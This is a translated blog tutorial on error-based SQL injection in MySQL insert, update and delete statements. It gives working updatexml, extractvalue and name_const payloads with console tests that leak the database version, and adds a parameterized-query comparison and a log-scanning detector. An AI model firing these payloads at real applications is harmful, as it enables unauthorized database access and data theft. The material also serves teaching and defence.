Injection methods for insert, update and delete

Disclaimer: This is the blogger's original article and may not be reproduced without the blogger's permission. https://blog.csdn.net/qq1124794084/article/details/84590929

The most common injection is in select queries, but SQL injection arises whenever a parameter that has not been checked and filtered is placed into a statement sent to the database.

In other words, besides queries, every request that interacts with the database can lead to injection, for example inserting, changing or deleting data. This post summarizes the injection methods for insert, update and delete, based on techniques found online.

The following error-based injection tests were run on database version 5.7.21.

They use the built-in functions updatexml, extractvalue or name_const.

The test table is as follows:

One, the updatexml() function

UPDATEXML(XML_document, XPath_string, new_value);
First argument: XML_document, in String format, the name of the XML document object, called Doc in this text.
Second argument: XPath_string (a string in XPath format); if you do not understand XPath syntax, find a tutorial online.
Third argument: new_value, in String format, replaces the matching data that was found.
Function: changes the value of the nodes in the document that meet the condition, that is, changes the value in XML_document that matches XPath_string.
Our injection statement:
updatexml(1, concat(0x7e, (SELECT @@version), 0x7e), 1)
Here concat() joins its arguments into one string that does not conform to the XPath_string format, so a format error is raised that echoes the string:
ERROR 1105 (HY000): XPATH syntax error: ': root @ localhost '

payload:

or updatexml(1,concat(0x7e,(version())),0) or

 

Test insert injection:

mysql> insert into info(name,age) values('wangwu'or updatexml(1,concat(0x7e,(version())),0) or'','22');
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'

Test update injection

mysql> update info set name='test'or updatexml(2,concat(0x7e,(version())),0) or'' where id =1;
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'
mysql> update info set name='test' where id =1 or updatexml(2,concat(0x7e,(version())),0);
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'

Test delete injection

mysql> delete from info where id=1 or updatexml(2,concat(0x7e,(version())),0);
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'
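
The insert test above works because the value for name is pasted into the statement text. The following added example (not part of the original post) runs the same statement once by string concatenation and once with bound parameters; it assumes an in-memory SQLite database as an offline stand-in for MySQL, and the helper names are hypothetical.

```python
import sqlite3

# Value supplied for `name` in the page's insert test.
PAYLOAD = "wangwu'or updatexml(1,concat(0x7e,(version())),0) or'"

def new_db():
    # Assumption: SQLite in memory stands in for MySQL so this runs offline.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE info (id INTEGER PRIMARY KEY, name TEXT, age TEXT)")
    return db

def insert_concatenated(db, name, age):
    """Vulnerable pattern: input becomes part of the statement text."""
    sql = "insert into info(name,age) values('%s','%s')" % (name, age)
    try:
        db.execute(sql)
        return "executed"
    except sqlite3.OperationalError as exc:
        # SQLite has no updatexml(), so it fails while resolving the call:
        # proof that the input was parsed as SQL rather than stored as data.
        return "parsed as SQL: %s" % exc

def insert_parameterized(db, name, age):
    """Hardened pattern: placeholders keep input out of the SQL grammar."""
    db.execute("insert into info(name,age) values(?, ?)", (name, age))
    return "executed"

def stored_names(db):
    return [row[0] for row in db.execute("SELECT name FROM info ORDER BY id")]

if __name__ == "__main__":
    db = new_db()
    print(insert_concatenated(db, PAYLOAD, "22"))
    print(insert_parameterized(db, PAYLOAD, "22"))
    print(stored_names(db))
```

The same rule applies to the update and delete statements: every value in SET and WHERE is bound, never formatted into the string.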

Two, the extractvalue() function

extractvalue(): a function that queries an XML document.
It is roughly equivalent to the familiar way of finding elements in an HTML file through tags such as <div>, <p> and <a>.
Syntax: extractvalue(target XML document, XML path)
The second argument, the XML path, is the part that can be manipulated. A position in an XML document is written in the form /xxx/xxx/xxx/...; if we write it in a different format, an error is raised, and the error returns the illegally formatted content we wrote, which is exactly the content we want to query.
When the second argument is in the normal position format /xxx/xx/xx/xx, no error is raised even if nothing is found.

payload:

or extractvalue(1,concat(0x7e,database())) or

Test insert injection

mysql> insert into info(name,age) values('wangwu'or extractvalue(1,concat(0x7e,version())) or'','22');
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'

Test update injection

mysql> update info set name='test' or extractvalue(1,concat(0x7e,version())) or'' where id =1;
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'
mysql> update info set name='test' where id =1 or extractvalue(1,concat(0x7e,version()));
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'

Test delete injection

mysql> delete from info where id=1 or extractvalue(1,concat(0x7e,version()));
ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'

Three, the name_const() function

name_const(name, value)
Returns the given value. When used to produce a result set column, name_const() causes the column to have the given name.

payload:

or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a) or

Test insert injection

mysql> insert into info(name,age) values('wangwu' or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a) or'','22');
ERROR 1060 (42S21): Duplicate column name '5.7.21'

Test update injection

mysql> update info set name='test'or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a) or'' where id =1;
ERROR 1060 (42S21): Duplicate column name '5.7.21'
mysql> update info set name='test' where id =1 or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a);
ERROR 1060 (42S21): Duplicate column name '5.7.21'

Test delete injection

mysql> delete from info where id=1 or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a);
ERROR 1060 (42S21): Duplicate column name '5.7.21'
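
All three techniques leave the same two traces: an insert, update or delete statement that calls updatexml, extractvalue or name_const, and an error 1105 or 1060 whose message carries the leaked value. The following added example (not part of the original post) scans a query or error log for both; the log lines are constructed from the statements on this page and the log layout is an assumption.

```python
import re

# Functions the page uses to force an error that carries query output.
ERROR_FUNCS = re.compile(r"\b(updatexml|extractvalue|name_const)\s*\(", re.I)
DML = re.compile(r"^\s*(insert|update|delete)\b", re.I)
# Error signatures shown in the page's test output.
LEAK = re.compile(r"ERROR (1105) \(HY000\): XPATH syntax error: '~?(.*)'$"
                  r"|ERROR (1060) \(42S21\): Duplicate column name '(.*)'$")

# Constructed sample log: one statement or error message per line (assumed layout).
SAMPLE_LOG = [
    "insert into info(name,age) values('zhangsan','30')",
    "insert into info(name,age) values('wangwu'or updatexml(1,concat(0x7e,(version())),0) or'','22')",
    "ERROR 1105 (HY000): XPATH syntax error: '~5.7.21'",
    "update info set name='test' where id =1",
    "delete from info where id=1 or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a)",
    "ERROR 1060 (42S21): Duplicate column name '5.7.21'",
]

def scan(lines):
    """Return (line number, kind, detail, detail) tuples for suspicious lines."""
    findings = []
    for n, line in enumerate(lines, 1):
        line = line.strip()
        m = LEAK.search(line)
        if m:
            code = m.group(1) or m.group(3)
            value = m.group(2) if m.group(1) else m.group(4)
            findings.append((n, "error-leak", code, value))
            continue
        verb = DML.match(line)
        funcs = sorted({f.lower() for f in ERROR_FUNCS.findall(line)})
        if verb and funcs:
            # A write statement has no ordinary reason to call these functions.
            findings.append((n, "dml-call", verb.group(1).lower(), ",".join(funcs)))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Keyword matching of this kind is a triage signal only; returning a generic error page instead of the raw database message removes the channel these functions rely on.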

Reference Links: https://www.cnblogs.com/r00tgrok/p/3854754.html

Real-world test:

HongCMS has a SQL injection in its back end when a table is cleared, that is, a delete injection.

Details: https://www.freebuf.com/vuls/178316.html

Use updatexml payload

Use extractvalue

Use name_const
